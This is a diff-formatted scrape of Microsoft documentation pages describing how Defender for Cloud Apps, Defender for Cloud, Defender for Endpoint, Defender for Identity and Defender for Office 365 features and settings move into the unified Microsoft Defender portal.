-> :::image type="content" source="../../media/defender-cloud-apps-m365-defender-control.png" alt-text="The new locations for Control features in the Microsoft Defender portal" lightbox="../../media/defender-cloud-apps-m365-defender-control.png":::
-
-| Defender for Cloud Apps | Microsoft Defender XDR |
-|||
-| Policies | Cloud apps -> Policy management. Note: Microsoft Entra ID Protection policies will be removed gradually from the Cloud apps policies list. To configure alerts from these policies, see [Configure Microsoft Entra IP alert service](investigate-alerts.md#configure-aad-ip-alert-service) |
-| Templates | Cloud apps -> Policy templates |
-
-### Settings
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/defender-cloud-apps-m365-defender-settings.png" alt-text="The new locations for Settings in the Microsoft Defender portal" lightbox="../../media/defender-cloud-apps-m365-defender-settings.png":::
-
-| Defender for Cloud Apps | Microsoft Defender XDR |
-|||
-| Settings | Settings -> Cloud apps |
-| Settings/Governance log | Cloud apps -> Governance log |
-| Security extensions -> Playbooks | Settings -> Cloud apps |
-| Security extensions -> SIEM agents | Settings -> Cloud apps |
-| Security extensions -> External DLP | Settings -> Cloud apps |
-| Security extensions -> API tokens | Settings -> Cloud apps |
-| Manage admin access -> Admin roles | Permissions-> Cloud apps-> Roles |
-| Manage admin access -> Activity privacy permissions | Permissions-> Cloud apps-> Activity privacy permissions |
-| Exported reports | Reports -> Cloud apps -> Exported reports |
-| Scoped deployment and privacy | Settings -> Cloud Apps -> Scoped deployment and privacy |
-| Connected Apps / App connectors | Settings -> Cloud Apps -> Connected apps -> App Connectors |
-| Conditional Access App Control | Settings -> Cloud apps -> Connected apps -> Conditional Access App Control apps |
-| IP address ranges | Settings -> Cloud apps |
-| User groups | Settings -> Cloud apps |
-
-The capabilities on the following pages are fully integrated into Microsoft Defender XDR, and therefore don't have their own standalone experience in Microsoft Defender XDR:
-
-- [Settings > Microsoft Entra ID Protection](investigate-alerts.md)-- [Settings > App Governance](/defender-cloud-apps/app-governance-get-started)-- [Settings > Microsoft Defender for Identity](/defender-for-identity/deploy-defender-identity)-
-## What's changed
-
-Learn about the changes that have come with the integration of Defender for Cloud Apps and Microsoft Defender XDR.
-
-### Global search
-
-Global search in Microsoft Defender XDR (using the search bar at the top of the page) now includes an additional searchable entity: it allows you to search for connected apps in Defender for Cloud Apps.
--
-### Assets and identities
-
-As part of the creation of a dedicated **Assets** section that spans the entire Microsoft Defender XDR experience, the **Users and Accounts** section of Defender for Cloud Apps is rebranded as the **Identities** section. No changes to functionality are expected.
-
-<a name='redirection-from-the-classic-microsoft-defender-for-cloud-apps-portal-to-microsoft-365-defender'></a>
-
-### Preview features in Defender for Cloud Apps
-
-Turn on the preview experience setting to be among the first to try upcoming features.
-
-> [!NOTE]
-> This feature is now available in public preview.
-
-1. Sign into Microsoft Defender XDR as a Global administrator, Security administrator, or Security Operator.
-
-1. Select **Settings** > **Cloud apps** > **Preview features** > **Enable preview features**.
-
-1. Select **Save** to save your changes.
-
-You'll know you have preview features turned on when you see that the **Enable preview features** check box is selected. For example:
--
-For more information, see [Microsoft Defender for Cloud Apps preview features](/defender-cloud-apps/preview-features).
-
-### Redirection from the classic Microsoft Defender for Cloud Apps portal to Microsoft Defender XDR
-
-Customers still using the classic Microsoft Defender for Cloud Apps portal are all automatically redirected to Microsoft 365, and customers using preview features with the classic portal now have no option to switch back. If you're not using preview features, admins can still update the redirect setting as needed to continue using the classic Defender for Cloud Apps portal.
-
-> [!NOTE]
-> If something isn't working for you or if there's anything you're unable to complete through Microsoft Defender XDR, we want to hear about it. If you've encountered any issues with redirection, we encourage you to let us know by using the Give feedback submission form.
->
-
-**To revert to the former Microsoft Defender for Cloud Apps portal**:
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> as a Global administrator, Security administrator, or Cloud App Security administrator in Azure Active directory, or a local global admin in Microsoft Defender for Cloud Apps.
-
-1. Make sure that you don't have Preview features turned on for your tenant. For more information, see [Preview features in Microsoft Defender for Cloud Apps](/defender-cloud-apps/preview-features).
-
-1. Navigate to **Settings** > **Cloud Apps** > **System** > **Redirection to Microsoft Defender XDR** or [go directly to the Redirection setting](https://security.microsoft.com/cloudapps/settings?tabid=autoRedirection).
-
-1. Toggle the **Automatic redirection** setting to **Off**.
-
-Once toggled off, accounts are no longer routed to *security.microsoft.com*. Active user sessions are not terminated, and the updates are applied only after the user ends their current session or opens a new tab.
-
-The update might take effect almost immediately in some accounts, but may take longer to propagate to every account in your organization. This setting can be turned back on again at any time.
--
-## Related videos
-
-Learn how to protect your cloud apps in Microsoft Defender XDR:
-
-**Protecting cloud apps in Microsoft Defender XDR**:<br>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE59yVU title="Protecting cloud apps in Microsoft Defender XDR"]
-
-<br>
-
-**Defender for Cloud Apps in Microsoft Defender XDR for customers migrating from the classic portal**<br>
-
-> [!VIDEO https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/video-embed.html?id=2105e5c9-23bf-41fb-a61d-0f0fae8ef05f title="Defender for Cloud Apps in Microsoft Defender XDR for customers migrating from the classic portal"]
--
-## Related information
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Contact support](/defender-cloud-apps/support-and-ts)
security Microsoft 365 Security Center Defender Cloud https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-defender-cloud.md
- Title: Microsoft Defender for Cloud in the Microsoft Defender portal
-description: Learn about changes in the Microsoft Defender portal with the Microsoft Defender for Cloud integration.
--- NOCSH--- Previously updated : 02/14/2024--- MOE150-- MET150--- m365-security -- tier2---
-# Microsoft Defender for Cloud in the Microsoft Defender portal
--
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/)-
-[Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction) is now part of Microsoft Defender XDR. Security teams can now access Defender for Cloud alerts and incidents within the Microsoft Defender portal, providing richer context to investigations that span cloud resources, devices, and identities. In addition, security teams can get the complete picture of an attack, including suspicious and malicious events that happen in their cloud environment, through immediate correlations of alerts and incidents.
-
-The Microsoft Defender portal combines protection, detection, investigation, and response capabilities to protect attacks on device, email, collaboration, identity, and cloud apps. The portal's detection and investigation capabilities are now extended to cloud entities, offering security operations teams a single pane of glass to significantly improve their operational efficiency.
-
-Moreover, the Defender for Cloud incidents and alerts are now part of [Microsoft Defender XDR's public API](api-overview.md). This integration allows exporting of security alerts data to any system using a single API.
-
-## Prerequisite
-
-To ensure access to Defender for Cloud alerts in the Microsoft Defender portal, you must be subscribed to any of the plans listed in [Connect your Azure subscriptions](/azure/defender-for-cloud/connect-azure-subscription).
-
-### Required permissions
-
-You must be a global administrator or a security administrator in Azure Active Directory to view Defender for Cloud alerts and correlations. For users that don't have these roles, the integration is available only by applying [unified role-based access control (RBAC) roles](manage-rbac.md) for Defender for Cloud.
-
-> [!NOTE]
-> The permission to view Defender for Cloud alerts and correlations is automatic for the entire tenant. Viewing for specific subscriptions is not supported.
-
-## Investigation experience in the Microsoft Defender portal
-
-The following section describes the detection and investigation experience in the Microsoft Defender portal with Defender for Cloud alerts.
-
-> [!NOTE]
-> Informational alerts from Defender for Cloud are not integrated to the Microsoft Defender portal to allow focus on the relevant and high severity alerts. This strategy streamlines management of incidents and reduces alert fatigue.
-
-> [!div class="mx-tdCol2BreakAl"]
-> |Area |Description |
-> |-|--|
-> |Incidents|All Defender for Cloud incidents will be integrated to the Microsoft Defender portal.</br></br> - Searching for cloud resource assets in the [incident queue](incident-queue.md) is supported.</br> - The [attack story](investigate-incidents.md#attack-story) graph will show the cloud resource.</br> - The [assets tab](investigate-incidents.md#assets) in an incident page will show the cloud resource.</br> - Each virtual machine has its own device page containing all related alerts and activity.</br></br> There will be no duplication of incidents from other Defender workloads.|
-> |Alerts|All Defender for Cloud alerts, including multi-cloud, internal and external providers' alerts will be integrated to the Microsoft Defender portal. Defender for Cloud alerts will show on the Microsoft Defender portal [alert queue](/microsoft-365/security/defender-endpoint/alerts-queue-endpoint-detection-response).</br></br> The *cloud resource* asset will show up in the Asset tab of an alert. Resources are clearly identified as an Azure, Amazon, or a Google Cloud resource.</br></br>Defender for Cloud alerts will automatically be associated with a tenant.</br></br>There will be no duplication of alerts from other Defender workloads.|
-> |Alert and incident correlation|Alerts and incidents are automatically correlated, providing robust context to security operations teams to understand the complete attack story in their cloud environment.|
-> |Threat detection|Accurate matching of virtual entities to device entities to ensure precision and effective threat detection.|
-> |Unified API|Defender for Cloud alerts and incidents are now included in [Microsoft Defender XDR's public API](api-overview.md), allowing customers to export their security alerts data into other systems using one API.|
-
-## Impact to Microsoft Sentinel users
-
-Microsoft Sentinel customers [integrating Microsoft Defender XDR incidents](/azure/sentinel/microsoft-365-defender-sentinel-integration) *and* ingesting Defender for Cloud alerts are required to make the following configuration changes to ensure that duplicate alerts and incidents aren't created:
--- Connect the **Tenant-based Microsoft Defender for Cloud (Preview)** connector to synchronize collection of alerts from all your subscriptions with tenant-based Defender for Cloud incidents that are streaming through the Microsoft Defender XDR Incidents connector.-- Disconnect the **Subscription-based Microsoft Defender for Cloud (Legacy)** alerts connector to prevent alert duplicates.-- Turn off any analytics rules&mdash;either [*Scheduled* (regular query-type) or *Microsoft security* (incident creation)](/azure/sentinel/detect-threats-built-in) rules&mdash;used to create incidents from Defender for Cloud alerts. Defender for Cloud Incidents are created automatically in the Defender portal and synchronized with Microsoft Sentinel.-- If necessary, [use automation rules](/azure/sentinel/create-manage-use-automation-rules) to close noisy incidents, or use the [built-in tuning capabilities in the Defender portal](investigate-alerts.md#tune-an-alert) to suppress certain alerts.-
-The following change should also be noted:
--- The action to relate alerts to the Microsoft Defender portal incidents is removed.-
-Learn more at [Ingest Microsoft Defender for Cloud incidents with Microsoft Defender XDR integration](/azure/sentinel/ingest-defender-for-cloud-incidents).
-
-### Turn off Defender for Cloud alerts
-
-The alerts for Defender for Cloud are turned on by default. To maintain your subscription-based settings and avoid tenant-based sync or to opt out from the experience, perform the following steps:
-
-1. In the Microsoft Defender portal, go to **Settings** > **Microsoft Defender XDR**.
-2. In **Alert service settings**, look for **Microsoft Defender for Cloud alerts**.
-3. Select **No alerts** to turn off all Defender for Cloud alerts. Selecting this option stops the ingestion of new Defender for Cloud alerts to the portal. Alerts previously ingested remain in an alert or incident page.
-
security Microsoft 365 Security Center Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-mde.md
- Title: Microsoft Defender for Endpoint in the Microsoft Defender portal
-description: Get an overview of what to expect when moving from the Microsoft Defender Security Center to the Microsoft Defender portal
--- NOCSH--- Previously updated : 02/27/2024--- MOE150-- MET150--- m365-security -- tier2---
-# Microsoft Defender for Endpoint in the Microsoft Defender portal
--
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article describes the Defender for Endpoint experience in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). Formerly, Defender for Endpoint customers used the Microsoft Defender Security Center ([https://securitycenter.windows.com](https://securitycenter.windows.com) or [https://securitycenter.microsoft.com](https://securitycenter.microsoft.com)).
-
-## Quick reference
-
-The image and the table below lists the changes in navigation between the Microsoft Defender Security Center and the Microsoft Defender portal.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../medie-m3d-security-center.png":::
-
-| Microsoft Defender Security Center | the Microsoft Defender portal |
-|||
-| Dashboards <ul><li>Security Operations</li><li>Threat Analytics</li></ul> |Home <ul><li>Threat analytics</li></ul> |
-| Incidents | Incidents & alerts |
-| Device inventory | Device inventory |
-| Alerts queue | Incidents & alerts |
-| Automated investigations | Action center |
-| Advanced hunting | Hunting |
-| Reports | Reports |
-| Partners & APIs | Partners & APIs |
-| Microsoft Defender Vulnerability Management | Vulnerability management |
-| Evaluation and tutorials | Evaluation & tutorials |
-| Configuration management | Configuration management |
-| Settings | Settings |
-
-The improved [Microsoft Defender portal](microsoft-365-defender-portal.md) at <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">https://security.microsoft.com</a> combines security capabilities that protect, detect, investigate, and respond to email, collaboration, identity, and device threats. This brings together functionality from existing Microsoft security portals, including Microsoft Defender Security Center and the Office 365 Security & Compliance center.
-
-If you're familiar with the Microsoft Defender Security Center, this article helps describe some of the changes and improvements in the Microsoft Defender portal. However there are some new and updated elements to be aware of.
-
-Historically, the [Microsoft Defender Security Center](/windows/security/threat-protection/microsoft-defender-atp/portal-overview) has been the home for Microsoft Defender for Endpoint. Enterprise security teams have used it to monitor and help responding to alerts of potential advanced persistent threat activity or data breaches. To help reduce the number of portals, the Microsoft Defender portal will be the home for monitoring and managing security across your Microsoft identities, data, devices, apps, and infrastructure.
-
-Microsoft Defender for Endpoint in the Microsoft Defender portal supports [granting access to managed security service providers (MSSPs)](/windows/security/threat-protection/microsoft-defender-atp/grant-mssp-access) in the same way [access is granted in the Microsoft Defender Security Center](mssp-access.md).
-
-> [!IMPORTANT]
-> What you see in the Microsoft Defender portal depends on your current subscriptions. For example, if you don't have a license for Microsoft Defender for Office 365, then the Email & Collaboration section will not be shown.
-
-> [!Note]
-> Microsoft Defender XDR is not fully available for:
->- US Government Community Cloud (GCC)
->- US Government Community Cloud High (GCC High)
->- US Department of Defense
->- All US government institutions with commercial licenses
->- See availability for the above environments here: [Microsoft Defender for Endpoint for US Government customers](/microsoft-365/security/defender-endpoint/gov?view=o365-worldwide&preserve-view=true)
-
-Take a look in the Microsoft Defender portal at <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">https://security.microsoft.com</a>.
-
-Learn more about the benefits: [Overview of Microsoft Defender XDR](microsoft-365-defender.md)
-
-## What's changed
-
-This table is a quick reference of the changes between the Microsoft Defender Security Center and the Microsoft Defender portal.
-
-### Alerts and actions
-
-| Area | Description of change |
-|||
-| [Incidents & alerts](incidents-overview.md) | In the Microsoft Defender portal, you can manage incidents and alerts across all of your endpoints, email, and identities. We've converged the experience to help you find related events more easily. For more information, see [Incidents Overview](incidents-overview.md). |
-| [Hunting](advanced-hunting-overview.md) | Modifying custom detection rules created in Microsoft Defender for Endpoint to include identity and email tables automatically moves them to the Microsoft Defender portal. Their corresponding alerts will also appear in the Microsoft Defender portal. For more details about these changes, read [Migrate custom detection rules](advanced-hunting-migrate-from-mde.md#migrate-custom-detection-rules). <br><br>The `DeviceAlertEvents` table for advanced hunting isn't available in the Microsoft Defender portal. To query device-specific alert information in the Microsoft Defender portal, you can use the `AlertInfo` and `AlertEvidence` tables to accommodate even more information from a diverse set of sources. Craft your next device-related query by following [Write queries without DeviceAlertEvents](advanced-hunting-migrate-from-mde.md#write-queries-without-devicealertevents).|
-|[Action center](m365d-action-center.md) | Lists pending and completed actions that were taken following automated investigations and remediation actions. Formerly, the Action center in the Microsoft Defender Security Center listed pending and completed actions for remediation actions taken on devices only, while Automated investigations listed alerts and status. In the improved the Microsoft Defender portal, the Action center brings together remediation actions and investigations across email, devices, and usersΓÇöall in one location. |
-| [Threat analytics](threat-analytics.md) | Moved to the top of the navigation bar for easier discovery and use. Now includes threat information for both endpoints and email and collaboration. |
-
-### Endpoints
-
-| Area | Description of change |
-|||
-|Search | The search bar is located at the top of the page. Suggestions are provided as you type. You can search across the following entities in Defender for Endpoint and Defender for Identity: <br><br> - **Devices** - supported for both Defender for Endpoint and Defender for Identity. You can even use search operators, for example, you can use "contains" to search for part of a host name. <br><br> - **Users** - supported for both Defender for Endpoint and Defender for Identity. <br><br> - **Files, IPs, and URLs** - same capabilities as in Defender for Endpoint. <br> NOTE: *IP and URL searches are exact match and don't appear in the search results page ΓÇô they lead directly to the entity page. <br><br> - **MDVM** - same capabilities as in Defender for Endpoint (vulnerabilities, software, and recommendations). <br><br> The enhanced search results page centralizes the results from all entities. |
-|[Dashboard](/windows/security/threat-protection/microsoft-defender-atp/security-operations-dashboard) | This is your security operations dashboard. See an overview of how many active alerts were triggered, which devices are at risk, which users are at risk, and severity level for alerts, devices, and users. You can also see if any devices have sensor issues, your overall service health, and how any unresolved alerts were detected. |
-|Device inventory | No changes. |
-|[Vulnerability management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt) | Name was shortened to fit in the navigation pane. It's the same as the Microsoft Defender Vulnerability Management section, with all the pages underneath. |
-| Partners and APIs | No changes. |
-| Evaluations & tutorials | New testing and learning capabilities. |
-| Configuration management | No changes. |
-
-> [!NOTE]
-> **Automatic investigation and remediation** is now a part of incidents. You can see Automated investigation and remediation events in the **Incident > Investigation** tab.
-
-> [!TIP]
-> Device search is done from Endpoints > Search.
-
-### Access and reporting
-
-| Area | Description of change |
-|||
-| Reports | See reports for endpoints and email & collaboration, including Threat protection, Device health and compliance, and Vulnerable devices. |
-| Health | Currently links out to the "Service health" page in the [Microsoft 365 admin center](https://admin.microsoft.com/). |
-| Settings | Manage your settings for the Microsoft Defender portal, Endpoints, Email & collaboration, Identities, and Device discovery. |
-
-## Microsoft 365 security navigation and capabilities
-
-The left navigation, or quick launch bar, will look familiar. However, there are some new and updated elements in Microsoft Defender portal.
-
-### Incidents and alerts
-
-Brings together incident and alert management across your email, devices, and identities. The alert page provides full context to the alert by combining attack signals to construct a detailed story. A new, unified experience now brings together a consistent view of alerts across workloads. You can quickly triage, investigate, and take effective action.
--- [Learn more about incidents](incidents-overview.md)-- [Learn more about managing alerts](investigate-alerts.md)--
-### Hunting
-
-Proactively search for threats, malware, and malicious activity across your endpoints, Office 365 mailboxes, and more by using [advanced hunting queries](advanced-hunting-overview.md). These powerful queries can be used to locate and review threat indicators and entities for both known and potential threats.
-
-[Custom detection rules](custom-detection-rules.md) can be built from advanced hunting queries to help you proactively watch for events that might be indicative of breach activity and misconfigured devices.
--
-### Action center
-
-Action center shows you the investigations created by automated investigation and response capabilities. This automated, self-healing in the Microsoft Defender portal can help security teams by automatically responding to specific events.
-
-[Learn more about the Action center](m365d-action-center.md).
-
-### Threat Analytics
-
-Get threat intelligence from expert Microsoft security researchers. Threat Analytics helps security teams be more efficient when facing emerging threats. Threat Analytics includes:
--- Email-related detections and mitigations from Microsoft Defender for Office 365. This is in addition to the endpoint data already available from Microsoft Defender for Endpoint.-- Incidents view related to the threats.-- Enhanced experience for quickly identifying and using actionable information in the reports.-
-You can access threat analytics either from the upper left navigation bar in the Microsoft Defender portal, or from a dedicated dashboard card that shows the top threats for your organization.
-
-Learn more about how to [track and respond to emerging threats with threat analytics](./threat-analytics.md).
-
-### Endpoints section
-
-View and manage the security of endpoints in your organization. If you've used the Microsoft Defender Security Center, it will look familiar.
--
-### Access and reports
-
-View reports, change your settings, and modify user roles.
--
-### SIEM API connections
-
-If you use the [Defender for Endpoint SIEM API](../defender-endpoint/enable-siem-integration.md), you can continue to do so. We've added new links on the API payload that point to the alert page or the incident page in the Microsoft 365 security portal. New API fields include LinkToMTP and IncidentLinkToMTP. For more information, see [Redirecting accounts from Microsoft Defender for Endpoint to The Microsoft Defender portal](./microsoft-365-security-mde-redirection.md).
-
-### Email alerts
-
-You can continue to use email alerts for Defender for Endpoint. We've added new links in the emails that point to the alert page or the incident page in The Microsoft Defender portal. For more information, see [Redirecting accounts from Microsoft Defender for Endpoint to The Microsoft Defender portal](./microsoft-365-security-mde-redirection.md).
-
-### Managed Security Service Providers (MSSP)
-
-Logging in to multiple tenants simultaneously in the same browsing session is currently not supported in the unified portal. You can opt out of the automatic redirection by [reverting to the former Microsoft Defender for Endpoint portal](microsoft-365-security-mde-redirection.md#can-i-go-back-to-using-the-former-portal), to maintain this functionality until the issue is resolved.
-
-## Related information
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Endpoint in The Microsoft Defender portal](microsoft-365-security-center-mde.md)-- [Redirecting accounts from Microsoft Defender for Endpoint to The Microsoft Defender portal](microsoft-365-security-mde-redirection.md)-
security Microsoft 365 Security Center Mdi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-mdi.md
- Title: Microsoft Defender for Identity in the Microsoft Defender portal
-description: Learn about changes from Microsoft Defender for Identity to The Microsoft Defender portal.
--- NOCSH--- Previously updated : 02/14/2024--- MOE150-- MET150--- m365-security -- tier2---
-# Microsoft Defender for Identity in the Microsoft Defender portal
--
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Identity](/defender-for-identity/)-
-Microsoft Defender for Identity is now part of The Microsoft Defender portal, the home for monitoring and managing security across your Microsoft identities, data, devices, apps, and infrastructure. The Microsoft Defender portal allows security admins to perform their security tasks in one location, which simplifies workflows and integrating functionality from other Microsoft Defender XDR services.
-
-Microsoft Defender for Identity contributes identity focused information into the incidents and alerts that The Microsoft Defender portal presents. This information is key to providing context and correlating alerts from the other products within Microsoft Defender XDR.
-
-<a name='converged-experiences-in-microsoft-365-defender'></a>
-
-## Converged experiences in The Microsoft Defender portal
-
-The [Microsoft Defender portal](https://security.microsoft.com) combines security capabilities that protect, detect, investigate, and respond to email, collaboration, identity, and device threats, and now includes all functionality provided in the [legacy, classic Defender for Identity portal](/previous-versions/defender-for-identity).
-
-While data placement might differ from the classic Defender for Identity portal, your data is now integrated into The Microsoft Defender portal pages so that you can view your data across all of your monitored entities.
-
-The following sections describe enhanced Defender for Identity features found in The Microsoft Defender portal.
-
-> [!NOTE]
-> Customers using the classic Defender for Identity portal are now [automatically redirected to The Microsoft Defender portal](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/leveraging-the-convergence-of-microsoft-defender-for-identity-in/ba-p/3856321), with no option to revert back to the classic portal.
--
-### Configuration and posture
-
-|Area |Description |
-|||
-|**Global exclusions** | Global exclusions allow you to define certain entities, such as IP addresses, devices, or domains, to be excluded across all Defender for Identity detections. For example, if you only exclude a device, the exclusion applies only to detections that have a *device* identification as part of the detection. <br><br> For more information, see [Global excluded entities](/defender-for-identity/exclusions). |
-|**Manage action and directory service accounts** | You might want to respond to compromised users by disabling their accounts or resetting their password. When you take either of these actions, The Microsoft Defender portal is configured by default to use the *local system* account. Therefore, you'll only need to configure action and directory service account settings if you want to have more control, and define a different user account to perform user remediation actions.<br><br> For more information, see [Microsoft Defender for Identity action accounts](/defender-for-identity/manage-action-accounts). |
-|**Custom permission roles** | The Microsoft Defender portal supports custom permission roles. <br><br>For more information, see [Microsoft Defender XDR role-based access control (RBAC)](manage-rbac.md) |
-|**Microsoft Secure Score** | Defender for Identity security posture assessments is available in [Microsoft Secure Score](https://security.microsoft.com/securescore). Each assessment is a downloadable report with instructions for use and tools to build an action plan for remediating or resolving the issue. Filter Microsoft Secure Score by **Identity** to view Defender for Identity assessments. <br><br> For more information, see [Microsoft Defender for Identity's security posture assessments](/defender-for-identity/security-assessment). |
-|**API** | Use any of the following Microsoft Defender XDR APIs with Defender for Identity: <br><br>- [Query activities via API](api-advanced-hunting.md) <br>- [Manage security alerts via API](api-incident.md) <br>- [Stream security alerts and activities to Microsoft Sentinel](streaming-api.md)<br><br>**Tip**: The Microsoft Defender portal only stores advanced hunting data for 30 days. If you need longer retention periods, stream the activities to Microsoft Sentinel or another partner security information and event management (SIEM) system. |
-| **Onboarding** | Defender for Identity onboarding is now automatic for new customers, with no need to configure a workspace. <br><br>If you need to delete your instance, open a Microsoft support case. |
-
-### Investigation
--
-|Area |Description |
-|||
-| **Identities** area| In The Microsoft Defender portal, expand the **Identities** area to view a **Dashboard** of graphs and widgets with commonly used data, a **Health issues** page, listing all health issues for your Defender for Identity deployment, and a **Tools** page, with links to commonly used tools and documentation. <br><br>For more information, see [View the ITDR dashboard](/defender-for-identity/dashboard) and [Defender for Identity health issues](/defender-for-identity/health-alerts). |
-|**Identity page** | The Microsoft Defender portal identity details page provides inclusive data about each identity, such as: <br><br>- Any associated alerts <br>- Active Directory account control<br>- Risky lateral movement paths<br>- A timeline of activities and alerts<br>- Details about observed locations, devices, and groups. <br><br>For more information, see [Investigate users in The Microsoft Defender portal](investigate-users.md). |
-|**Device page** | The Microsoft Defender portal alert evidence lists all devices and users connected to each suspicious activity. Investigate further by selecting a specific device in an alert to access a device details page. <br><br>For more information, see [Investigate devices in the Microsoft Defender for Endpoint Devices list](../defender-endpoint/investigate-machines.md). |
-|**Advanced hunting** | The Microsoft Defender portal helps you proactively search for threats and malicious activity by using advanced hunting queries. These powerful queries can be used to locate and review threat indicators and entities for both known and potential threats. <br><br>Build custom detection rules from advanced hunting queries to help you proactively watch for events that might be indicative of breach activity and misconfigured devices. <br><br>For more information, see [Proactively hunt for threats with advanced hunting in the Microsoft Defender portal](advanced-hunting-overview.md). |
-|**Global search** | Use the search bar at the top of the Microsoft Defender portal page to search for any entity being monitored by Microsoft Defender XDR, including identities, endpoints, Office 365 data, Active Directory groups (Preview), and more. <br><br>Select results directly from the search drop-down, or select **All users** or **All devices** to see all entities associated with a given search term. |
-| **Lateral movement paths** | The Microsoft Defender portal provides lateral movement path data on the **Advanced hunting** page and the **Lateral movement paths** security assessment, in addition to the **Lateral movement paths** tab on the user details page. <br><br> For more information, see [Understand and investigate lateral movement paths (LMPs) with Microsoft Defender for Identity](/defender-for-identity/understand-lateral-movement-paths). |
-
-### Detection and response
-
-|Area |Description |
-|||
-| **Alert and incident correlation** |Defender for Identity alerts is now included in the Microsoft Defender portal's alert queue, making them available to the automated incident correlation feature. <br><br>View all of your alerts in one place, and determine the scope of the breach even quicker than before. <br><br>For more information, see [Investigate Defender for Identity alerts in the Microsoft Defender portal](/defender-for-identity/manage-security-alerts). |
-| **Alert exclusions** |The Microsoft Defender portal's alert interface is more user friendly, and includes a search function and global exclusions, meaning you can exclude any entity from all alerts generated by Defender for Identity. <br><br>For more information, see [Configure Defender for Identity detection exclusions in Microsoft Defender XDR](/defender-for-identity/exclusions).|
-| **Alert tuning** |Alert tuning, previously known as *alert suppression*, allows you to adjust and optimize your alerts. Alert tuning reduces false positives, allowing your SOC teams to focus on high-priority alerts, and improves threat detection coverage across your system.<br><br> In Microsoft Defender XDR, create rule conditions based on evidence types, and then apply your rule on any rule type that matches your conditions. For more information, see [Tune an alert](investigate-alerts.md#tune-an-alert).|
-| **Remediation actions** |Defender for Identity remediation actions, such as disabling accounts or requiring password resets, are available from the Microsoft Defender portal user details page. <br><br>For more information, see [Remediation actions in Microsoft Defender for Identity](/defender-for-identity/remediation-actions).
---
-## Quick reference
-
-The following table lists the changes in navigation between Microsoft Defender for Identity and the Microsoft Defender portal.
-
-| **Defender for** Identity | **The Microsoft Defender portal** |
-| -- | |
-| **Timeline** |- Microsoft Defender portal Alerts/Incidents queue |
-| **Reports** |The following types of reports are available from the **Reports** > **Identities** > **Report management** page in the Microsoft Defender portal, either for immediate download or scheduled for a periodic email delivery: <br><br>- A summary report of alerts and health issues you should take care of. <br>- A list of each time a modification is made to sensitive groups. <br>- A list of source computer and account passwords that are detected as being sent in clear text.<br>- A list of the sensitive accounts exposed in lateral movement paths. <br><br>For more information, see [Report management](/defender-for-identity/reports). |
-| **Identity page** | Microsoft Defender portal user details page |
-| **Device page** | Microsoft Defender portal device details page |
-| **Group page** | Microsoft Defender portal groups side pane |
-| **Alert page** | Microsoft Defender portal alert details page <br><br>**Tip**: Use [alert tuning](investigate-alerts.md#tune-an-alert) to optimize the alerts you see in the Microsoft Defender portal. |
-| **Search** | Microsoft Defender portal global search |
-| **Health issues** | Microsoft Defender portal **Identities > Health issues** |
-| **Entity activities** | - **Advanced hunting** <br>- Device page > **Timeline** <br>- Identity page > **Timeline** tab <br>- **Group** pane > **Timeline** tab |
-| **Settings** | **Settings** -> **Identities** |
-| **Users and accounts** | **Assets** -> **Identities** |
-| **Identity security posture** | [Microsoft Defender for Identity's security posture assessments](/defender-for-identity/security-assessment) |
-| **Onboarding a new workspace** | **Settings** -> **Identities** (automatically) |
-| **About** | **Settings > Identities > About** |
--
-## Next steps
-
-For more information, see:
--- [Related videos for Microsoft Defender for Identity](https://www.microsoft.com/videoplayer/embed/RE4HcEU)-- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Identity](/defender-for-identity/)-
security Microsoft 365 Security Center Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-mdo.md
- Title: Microsoft Defender for Office 365 in the Microsoft Defender portal
-description: Learn about changes from the Security & Compliance Center to The Microsoft Defender portal.
Previously updated : 02/27/2024------ MET150-- MOE150--- m365-security-- tier2----
-# Microsoft Defender for Office 365 in the Microsoft Defender portal
--
-**Applies to:**
-- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)-
-This article describes the Defender for Office 365 experience in the Microsoft Defender portal. Formerly, Defender for Office 365 customers used the Office 365 Security & Compliance center ([https://protection.office.com](https://protection.office.com)).
-
-## Quick reference
-
-The table below lists the changes in navigation between the Security & Compliance Center and The Microsoft Defender portal.
-
-|[Security & Compliance Center](https://protection.office.com)|[The Microsoft Defender portal](https://security.microsoft.com)|[Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)|[Exchange admin center](https://admin.exchange.microsoft.com)|
-|||||
-|Alerts|<ul><li>[Alert Policies](https://security.microsoft.com/alertpolicies)</li><li>[Incidents & alerts](https://security.microsoft.com/alerts)</li></ul>|[Alerts page](https://compliance.microsoft.com/homepage)||
-|Classification||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Data loss prevention||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Records management||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
